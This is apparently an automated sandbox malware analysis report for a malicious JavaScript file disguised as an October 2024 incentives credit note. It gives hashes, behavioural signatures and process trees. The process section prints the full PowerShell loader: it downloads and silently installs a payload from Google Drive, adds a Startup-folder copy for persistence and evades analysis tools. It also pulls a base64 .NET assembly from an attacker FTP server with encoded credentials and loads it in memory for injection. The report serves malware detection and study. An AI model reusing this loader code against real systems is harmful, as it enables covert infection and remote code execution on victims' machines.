Analysis
-
max time kernel
119s
max time network
121s
platform
windows7_x64
resource
win7-20240903-en
resource tags
arch:x64, arch:x86, image:win7-20240903-en, locale:en-us, os:windows7-x64, system
submitted
13-11-2024 20:04
Static task
static1
Behavioral task
behavioral1
Sample
INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js
Resource
win7-20240903-en
Behavioral task
behavioral2
Sample
INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js
Resource
win10v2004-20241007-en
General
-
Target
INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js
-
Size
196KB
-
MD5
0dfe5dafeec713de2d6449c7980ac842
-
SHA1
61c9a5d13802e747a8feec2f88d3de52e32ca32c
-
SHA256
380f33fdb8df5c4848c2e50bc34d232178acb50bde94c58c1076196f876e7859
-
SHA512
ddda548c0ce78a29fa944312533dc01138a655e672af1bb5eb9c63823b0e3412b9c99ad4e643cf7916c6a57537bf8a55583f934b74c70fc68c9d6c19d4cb549a
-
SSDEEP
3072:AW1tKbWXt+NWXt+NWXt+NWXt+NWXt+NWXt+9DWXt+NWXt+NWXt+NWXt+NWXt+NWy:uz
Malware Config
Extracted
https://drive.google.com/uc?export=download&id=
Signatures
-
Blocklisted process makes network request 2 IoCs
flow | pid | Process
5 | 2804 | powershell.exe
7 | 2804 | powershell.exe
pid | Process
2432 | powershell.exe
1320 | powershell.exe
2804 | powershell.exe
Drops startup file 2 IoCs
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js | powershell.exe
File opened for modification | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js | powershell.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs
flow | ioc
5 | drive.google.com
4 | drive.google.com
Drops file in Windows directory 3 IoCs
description | ioc | Process
File opened for modification | C:\Windows\Logs\DPX\setuperr.log | wusa.exe
File created | C:\Windows\wusa.lock | wusa.exe
File opened for modification | C:\Windows\Logs\DPX\setupact.log | wusa.exe
Command and Scripting Interpreter: JavaScript 1 TTPs
-
Suspicious behavior: EnumeratesProcesses 4 IoCs
pid | Process
1320 | powershell.exe
2804 | powershell.exe
3044 | powershell.exe
2432 | powershell.exe
Suspicious use of AdjustPrivilegeToken 4 IoCs
description | pid | Process
Token: SeDebugPrivilege | 1320 | powershell.exe
Token: SeDebugPrivilege | 2804 | powershell.exe
Token: SeDebugPrivilege | 3044 | powershell.exe
Token: SeDebugPrivilege | 2432 | powershell.exe
Suspicious use of WriteProcessMemory 15 IoCs
description | pid | Process | procid_target
PID 340 wrote to memory of 1320 | 340 | wscript.exe | 30
PID 340 wrote to memory of 1320 | 340 | wscript.exe | 30
PID 340 wrote to memory of 1320 | 340 | wscript.exe | 30
PID 1320 wrote to memory of 2804 | 1320 | powershell.exe | 32
PID 1320 wrote to memory of 2804 | 1320 | powershell.exe | 32
PID 1320 wrote to memory of 2804 | 1320 | powershell.exe | 32
PID 2804 wrote to memory of 3044 | 2804 | powershell.exe | 34
PID 2804 wrote to memory of 3044 | 2804 | powershell.exe | 34
PID 2804 wrote to memory of 3044 | 2804 | powershell.exe | 34
PID 3044 wrote to memory of 2704 | 3044 | powershell.exe | 35
PID 3044 wrote to memory of 2704 | 3044 | powershell.exe | 35
PID 3044 wrote to memory of 2704 | 3044 | powershell.exe | 35
PID 2804 wrote to memory of 2432 | 2804 | powershell.exe | 36
PID 2804 wrote to memory of 2432 | 2804 | powershell.exe | 36
PID 2804 wrote to memory of 2432 | 2804 | powershell.exe | 36
Processes
-
C:\Windows\system32\wscript.exe
wscript.exe "C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js"
(process tree depth 1)
- Suspicious use of WriteProcessMemory
PID: 340
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $jPhaA = '[obfuscated base64 string omitted from this copy of the report]';$jPhaA = $jPhaA.replace('革','B') ;$jPhaA = [System.Convert]::FromBase64String( $jPhaA ) ;;;$jPhaA = [System.Text.Encoding]::Unicode.GetString( $jPhaA ) ;$jPhaA = $jPhaA.replace('%DCPJU%','C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js') ;powershell $jPhaA
(process tree depth 2)
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 1320
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$KATih = $host.Version.Major.Equals(2);If ( $KATih ) {$HzOMj = [System.IO.Path]::GetTempPath();del ($HzOMj + '\Upwin.msu');$pnrdy = 'https://drive.google.com/uc?export=download&id=';$klkAE = $env:PROCESSOR_ARCHITECTURE.Contains('64');if ( $klkAE ) {$pnrdy = ($pnrdy + '1NaqdNXiGvI_q1RPkazFtMygmaqTJXu42') ;}else {$pnrdy = ($pnrdy + '1g1jmXusX9mc9VmhVrJJ2XofZ3aK_cLOt') ;};$qvkqf = ( New-Object Net.WebClient ) ;$qvkqf.Encoding = [System.Text.Encoding]::UTF8 ;$qvkqf.DownloadFile($pnrdy, ($HzOMj + '\Upwin.msu') ) ;$Jnygl = ( 'C:\Users\' + [Environment]::UserName );tkplB = ( $HzOMj + '\Upwin.msu' ) ; powershell.exe wusa.exe tkplB /quiet /norestart ; Copy-Item 'C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js' -Destination ( $Jnygl + '\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup' ) -force ;powershell.exe -command 'sleep 180'; shutdown.exe /r /t 0 /f }else {[System.Net.ServicePointManager]::ServerCertificateValidationCallback = {$true} ;[System.Net.ServicePointManager]::SecurityProtocol = [System.Net.SecurityProtocolType]::Tls12 ;if((get-process 'Wireshark','apateDNS','analyze' -ea SilentlyContinue) -eq $Null){ } else{ Restart-Computer -force ; exit ; } ;$aAAIe = ('ftp://[email protected]/Upcrypter' + '/02/DLL01.txt') ;$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt'); $credential = (New-Object PSCredential((-join [char[]](100,101,115,99,107,118,98,114,97,116,49)), (ConvertTo-SecureString -AsPlainText -Force -String (-join [char[]](109, 102, 110, 69, 100, 77, 68, 76, 110, 69, 64, 64, 49, 53, 55, 56 )))));;Invoke-WebRequest -URI $aAAIe -OutFile $YDKeB -Credential $credential -UseBasicParsing ;cmd.exe /c ;ping 127.0.0.1 ;powershell.exe -command {$YDKeB = ([System.IO.Path]::GetTempPath() + 'dll01.txt') ;$czrll = ( Get-Content -Path $YDKeB ) ;Invoke-WebRequest -URI $czrll -OutFile $YDKeB -UseBasicParsing} ;$qaqxE = ( Get-Content -Path $YDKeB -Encoding UTF8) ;[Byte[]] $dCiWz = [System.Convert]::FromBase64String( $qaqxE.Replace( '↓:↓' , 'A' ) ) ;$njcbq = 'ClassLibrary3.' ;$LLQud = 'Class1' ;$neUmV = 'prFVI' ;[System.AppDomain]::CurrentDomain.Load( $dCiWz ).GetType( $njcbq + $LLQud ).GetMethod( $neUmV ).Invoke($null, [object[]] ( '0/h7RKJ/r/ee.etsap//:sptth' , 'C:\Users\Admin\AppData\Local\Temp\INCENTIVES LAST WEEK CREDIT NOTE-OCT2024.js', 'D D1DAddInProcess32' ) ) ;};"
(process tree depth 3)
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Drops startup file
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 2804
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" wusa.exe tkplB /quiet /norestart
(process tree depth 4)
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID: 3044
C:\Windows\system32\wusa.exe
"C:\Windows\system32\wusa.exe" tkplB /quiet /norestart
(process tree depth 5)
- Drops file in Windows directory
PID: 2704
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command "sleep 180"
(process tree depth 4)
- Command and Scripting Interpreter: PowerShell
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID: 2432
Network
MITRE ATT&CK Enterprise v15
Downloads
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\590aee7bdd69b59b.customDestinations-ms
Filesize
7KB
MD5
3bafba7115a0e2a05be05ae90aeb706a
SHA1
fc55420031fb2780fc06b38a60a1d78c41c3e378
SHA256
e8c30935e45d404b86928bc7637cb1d0761514070e34a845c3d665373b171825
SHA512
6dc51b04d4172c00988e3f8fe6cd359a68381c6f4cd84e33b59de4df3db232200cc1651aabe222a87940cfe64a1297c80faa9decc469fce1b31567f1a5b40e12